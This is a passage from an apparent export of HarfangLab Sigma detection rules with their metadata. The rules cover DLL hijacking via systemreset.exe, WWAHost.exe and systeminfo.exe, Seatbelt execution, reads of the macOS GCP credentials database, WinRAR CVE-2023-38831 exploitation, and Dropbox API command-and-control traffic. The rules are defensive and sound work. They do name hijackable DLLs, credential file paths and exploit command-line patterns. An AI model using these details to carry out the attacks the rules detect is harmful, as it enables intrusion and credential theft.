"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_systemreset.yml",
"content": "title: DLL Hijacking via systemreset.exe\nid: 2e58af7c-54b9-470d-b64b-f3731c941837\ndescription: |\n Detects potential Windows DLL Hijacking via systemreset.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'systemreset.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcd.dll'\n - '\\Cabinet.dll'\n - '\\d3d10warp.dll'\n - '\\d3d11.dll'\n - '\\dbgcore.DLL'\n - '\\DismApi.DLL'\n - '\\dxgi.dll'\n - '\\FVEAPI.dll'\n - '\\ReAgent.dll'\n - '\\ResetEngine.dll'\n - '\\tbs.dll'\n - '\\VSSAPI.DLL'\n - '\\VssTrace.DLL'\n - '\\WDSCORE.dll'\n - '\\WIMGAPI.DLL'\n - '\\WINHTTP.dll'\n - '\\WOFUTIL.dll'\n - '\\XmlLite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2e58af7c-54b9-470d-b64b-f3731c941837",
"rule_name": "DLL Hijacking via systemreset.exe",
"rule_description": "Detects potential Windows DLL Hijacking via systemreset.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2e6c9be7-7b83-4cf8-8c6f-ffbf9b4ce480",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.588697Z",
"creation_date": "2026-03-23T11:45:34.588700Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.588708Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wwahost.yml",
"content": "title: DLL Hijacking via WWAHost.exe\nid: 2e6c9be7-7b83-4cf8-8c6f-ffbf9b4ce480\ndescription: |\n Detects potential Windows DLL Hijacking via WWAHost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'WWAHost.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\iertutil.dll'\n - '\\profapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2e6c9be7-7b83-4cf8-8c6f-ffbf9b4ce480",
"rule_name": "DLL Hijacking via WWAHost.exe",
"rule_description": "Detects potential Windows DLL Hijacking via WWAHost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2e734ab0-736c-4df7-904a-68429e75bea2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.606287Z",
"creation_date": "2026-03-23T11:45:34.606291Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.606298Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/GhostPack/Seatbelt",
"https://attack.mitre.org/techniques/T1082/"
],
"name": "t1082_launch_seatbelt.yml",
"content": "title: Seatbelt HackTool Executed\nid: 2e734ab0-736c-4df7-904a-68429e75bea2\ndescription: |\n Detects the execution of the Seatbelt host enumeration and security assessment tool.\n Seatbelt is an offensive security tool commonly used by attackers during the discovery phase to gather detailed system information, security configurations, and potential weaknesses that could be exploited for privilege escalation.\n Unless this execution is part of an authorized security audit, it is recommended to investigate the context of this activity including the user account involved and any data gathered by the tool, as it may indicate reconnaissance for an attack.\nreferences:\n - https://github.com/GhostPack/Seatbelt\n - https://attack.mitre.org/techniques/T1082/\ndate: 2021/04/26\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1082\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.Seatbelt\n - classification.Windows.Behavior.Discovery\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\Seatbelt.exe'\n - OriginalFileName: 'Seatbelt.exe'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2e734ab0-736c-4df7-904a-68429e75bea2",
"rule_name": "Seatbelt HackTool Executed",
"rule_description": "Detects the execution of the Seatbelt host enumeration and security assessment tool.\nSeatbelt is an offensive security tool commonly used by attackers during the discovery phase to gather detailed system information, security configurations, and potential weaknesses that could be exploited for privilege escalation.\nUnless this execution is part of an authorized security audit, it is recommended to investigate the context of this activity including the user account involved and any data gathered by the tool, as it may indicate reconnaissance for an attack.\n",
"rule_creation_date": "2021-04-26",
"rule_modified_date": "2025-04-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1082"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2e7c5a05-6c01-4aac-b25c-16ea27b31087",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098251Z",
"creation_date": "2026-03-23T11:45:34.098253Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098258Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1552/001/"
],
"name": "t1552_004_gcp_config_read_macos.yml",
"content": "title: Suspicious Access to GCP Database File\nid: 2e7c5a05-6c01-4aac-b25c-16ea27b31087\ndescription: |\n Detects an attempt to read the content of the GCP database.\n Adversaries may access a user's GCP database file in order to gather credentials and move to cloud environments.\n It is recommended to verify if the process performing the read operation has legitimate reasons to do so.\nreferences:\n - https://attack.mitre.org/techniques/T1552/001/\ndate: 2024/06/18\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1552.001\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.CredentialAccess\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n selection_files:\n Kind: 'read'\n Path: '/Users/*/.config/gcloud/credentials.db'\n ProcessImage|contains: '?'\n\n# Common exclusion\n ### system app ###\n filter_systemapp:\n Image:\n - '/System/Library/Services/*'\n - '/System/Library/PrivateFrameworks/*'\n - '/System/Library/CoreServices/*'\n - '/System/Library/Frameworks/CoreServices.framework/*'\n - '/System/Library/ExtensionKit/Extensions/*'\n - '/System/Library/Frameworks/*'\n - '/usr/sbin/filecoordinationd'\n exclusion_systemextension:\n Image|startswith: '/Library/SystemExtensions/????????-????-????-????-????????????/'\n exclusion_virtualization:\n Image: '/System/Library/Frameworks/Virtualization.framework/Versions/A/XPCServices/com.apple.Virtualization.VirtualMachine.xpc/Contents/MacOS/com.apple.Virtualization.VirtualMachine'\n\n ### security tools ###\n exclusion_hurukai:\n Image: '/Applications/HarfangLab Hurukai.app/Contents/MacOS/hurukai'\n exclusion_fortinet:\n Image:\n - '/Library/Application Support/Fortinet/FortiClient/bin/fmon2.app/Contents/MacOS/fmon2'\n - '/Library/Application Support/Fortinet/FortiClient/bin/fcaptmon'\n - '/Library/Application Support/Fortinet/FortiClient/bin/scanunit'\n exclusion_microsoft_defender:\n Image:\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon_enterprise.app/Contents/MacOS/wdavdaemon_enterprise'\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon'\n exclusion_fsecure:\n Image:\n - '/usr/local/f-secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fsavd.app/Contents/MacOS/fsavd'\n exclusion_bitdefender:\n Image: '/Library/Bitdefender/AVP/product/bin/BDLDaemon.app/Contents/MacOS/BDLDaemon'\n exclusion_eset:\n Image:\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_sci'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_gui'\n - '/Applications/ESET Endpoint Antivirus.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Cyber Security.app/Contents/MacOS/esets_daemon'\n exclusion_withssecure:\n Image:\n - '/Library/WithSecure/bin/wsesproviderd.xpc/Contents/MacOS/wsesproviderd'\n - '/Library/WithSecure/bin/wsavd.app/Contents/MacOS/wsavd'\n exclusion_sentinel:\n Image: '/Library/Sentinel/sentinel-agent.bundle/Contents/MacOS/sentineld_helper.app/Contents/MacOS/sentineld_helper'\n exclusion_avast:\n Image: '/Applications/Avast.app/Contents/Backend/utils/com.avast.Antivirus.EndpointSecurity.app/Contents/MacOS/com.avast.Antivirus.EndpointSecurity'\n exclusion_trend:\n Image: '/Applications/TrendMicroSecurity.app/Contents/Resources/iCoreService.app/Contents/MacOS/iCoreService'\n exclusion_sophos:\n Image: '/Library/Sophos Anti-Virus/SophosScanAgent.app/Contents/MacOS/SophosScanAgent'\n\n ### backup sofware ###\n exclusion_arq:\n Image: '/Applications/Arq.app/Contents/Resources/ArqAgent.app/Contents/MacOS/ArqAgent'\n\n # AtempoLiveNavigator\n exclusion_hnagent:\n Image: '/Library/Application Support/HN/base/bin/HNagent'\n\n exclusion_wddesktop:\n Image:\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/kdd'\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/wdsync'\n\n ### misc\n exclusion_vscode:\n Image:\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n - '/Users/*/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n# end common exclusion\n\n exclusion_haxm:\n Image: '/usr/local/haxm/*/haxm'\n ProcessSignatureSigningId: 'Agent_final'\n ProcessSigned: 'true'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2e7c5a05-6c01-4aac-b25c-16ea27b31087",
"rule_name": "Suspicious Access to GCP Database File",
"rule_description": "Detects an attempt to read the content of the GCP database.\nAdversaries may access a user's GCP database file in order to gather credentials and move to cloud environments.\nIt is recommended to verify if the process performing the read operation has legitimate reasons to do so.\n",
"rule_creation_date": "2024-06-18",
"rule_modified_date": "2025-10-29",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1552.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2e91d378-094f-4d0e-8695-ea6539ed28c9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084718Z",
"creation_date": "2026-03-23T11:45:34.084720Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084724Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/",
"https://nvd.nist.gov/vuln/detail/CVE-2023-38831",
"https://attack.mitre.org/techniques/T1203/"
],
"name": "t1203_winrar_vulnerability.yml",
"content": "title: WinRAR CVE-2023-38831 Vulnerability Exploited\nid: 2e91d378-094f-4d0e-8695-ea6539ed28c9\ndescription: |\n Detects command-lines related to the exploitation of CVE-2023-38831, a vulnerability affecting WinRAR.\n WinRAR before 6.23 allows attackers to execute arbitrary code when a user attempts to view a benign file within a ZIP archive.\n This vulnerability was exploited in the wild in April through August 2023.\n It is recommended to investigate any child processes and alerts on the affected machine.\nreferences:\n - https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/\n - https://nvd.nist.gov/vuln/detail/CVE-2023-38831\n - https://attack.mitre.org/techniques/T1203/\ndate: 2023/08/25\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1203\n - cve.2023-38831\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Exploit.CVE-2023-38831\n - classification.Windows.Behavior.Phishing\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n ParentImage|endswith: '\\Winrar.exe'\n CommandLine|startswith: '?:\\Windows\\system32\\cmd.exe /c ?:\\Users\\\\*\\AppData\\Local\\Temp\\Rar$*\\'\n\n selection_extension:\n CommandLine|endswith:\n - ' .exe'\n - ' .cmd'\n - ' .bat'\n - ' .vbs'\n - ' .wsf'\n - ' .wsh'\n - ' .ps1'\n - ' .js'\n - ' .exe '\n - ' .cmd '\n - ' .bat '\n - ' .vbs '\n - ' .wsf '\n - ' .wsh '\n - ' .ps1 '\n - ' .js '\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2e91d378-094f-4d0e-8695-ea6539ed28c9",
"rule_name": "WinRAR CVE-2023-38831 Vulnerability Exploited",
"rule_description": "Detects command-lines related to the exploitation of CVE-2023-38831, a vulnerability affecting WinRAR.\nWinRAR before 6.23 allows attackers to execute arbitrary code when a user attempts to view a benign file within a ZIP archive.\nThis vulnerability was exploited in the wild in April through August 2023.\nIt is recommended to investigate any child processes and alerts on the affected machine.\n",
"rule_creation_date": "2023-08-25",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1203"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2eedf312-fb18-46f6-8ce9-aed5bedd3dd7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.593612Z",
"creation_date": "2026-03-23T11:45:34.593616Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.593623Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_systeminfo.yml",
"content": "title: DLL Hijacking via systeminfo.exe\nid: 2eedf312-fb18-46f6-8ce9-aed5bedd3dd7\ndescription: |\n Detects potential Windows DLL Hijacking via systeminfo.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'systeminfo.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\fastprox.dll'\n - '\\mpr.dll'\n - '\\SspiCli.dll'\n - '\\version.dll'\n - '\\wbemprox.dll'\n - '\\wbemsvc.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2eedf312-fb18-46f6-8ce9-aed5bedd3dd7",
"rule_name": "DLL Hijacking via systeminfo.exe",
"rule_description": "Detects potential Windows DLL Hijacking via systeminfo.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2f4b9ca0-a3f3-4e38-a62f-aedbfe8a362c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.602948Z",
"creation_date": "2026-03-23T11:45:34.602952Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.602972Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securelist.com/bad-magic-apt/109087/",
"https://attack.mitre.org/techniques/T1071/001/"
],
"name": "t1071_001_suspicious_url_request_to_dropbox.yml",
"content": "title: Suspicious URL Request to the Dropbox API\nid: 2f4b9ca0-a3f3-4e38-a62f-aedbfe8a362c\ndescription: |\n Detects suspicious URL requests to the Dropbox API.\n Adversaries can use legitimate webservices to hide malicious command and control traffic.\n The Powermagic malware is known to use the Dropbox API to communicate with the attackers.\n It is recommended to analyze the process performing the URL request to determine whether its network communication to the DropBox API is legitimate.\nreferences:\n - https://securelist.com/bad-magic-apt/109087/\n - https://attack.mitre.org/techniques/T1071/001/\ndate: 2023/03/24\nmodified: 2025/09/23\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1071.001\n - attack.t1102.002\n - attack.exfiltration\n - attack.t1567.002\n - classification.Windows.Source.UrlRequest\n - classification.Windows.Behavior.Masquerading\n - classification.Windows.Behavior.Exfiltration\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: url_request\ndetection:\n selection:\n RequestUrlHost:\n - 'content.dropboxapi.com'\n - 'api.dropboxapi.com'\n\n filter_dropbox:\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Google Inc'\n - 'Google LLC'\n - 'Dropbox, Inc'\n - 'Piriform Software Ltd'\n\n filter_dropbox_useragent:\n UserAgent|startswith: 'DropboxWindowsApp/'\n\n exclusion_dropboxuniversal:\n ProcessOriginalFileName: 'DropboxUniversal.exe'\n\n exclusion_rekordbox:\n # https://api.dropboxapi.com/2/auth/token/revoke\n ProcessOriginalFileName: 'rekordbox.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'AlphaTheta Corporation'\n\n exclusion_totalcmd64:\n ProcessOriginalFileName: 'totalcmd64.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Ghisler Software GmbH'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2f4b9ca0-a3f3-4e38-a62f-aedbfe8a362c",
"rule_name": "Suspicious URL Request to the Dropbox API",
"rule_description": "Detects suspicious URL requests to the Dropbox API.\nAdversaries can use legitimate webservices to hide malicious command and control traffic.\nThe Powermagic malware is known to use the Dropbox API to communicate with the attackers.\nIt is recommended to analyze the process performing the URL request to determine whether its network communication to the DropBox API is legitimate.\n",
"rule_creation_date": "2023-03-24",
"rule_modified_date": "2025-09-23",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1071.001",
"attack.t1102.002",
"attack.t1567.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2f78ddbf-ec12-46ef-b5f4-1c5272a8acd3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.615612Z",
"creation_date": "2026-03-23T11:45:34.615615Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.615623Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
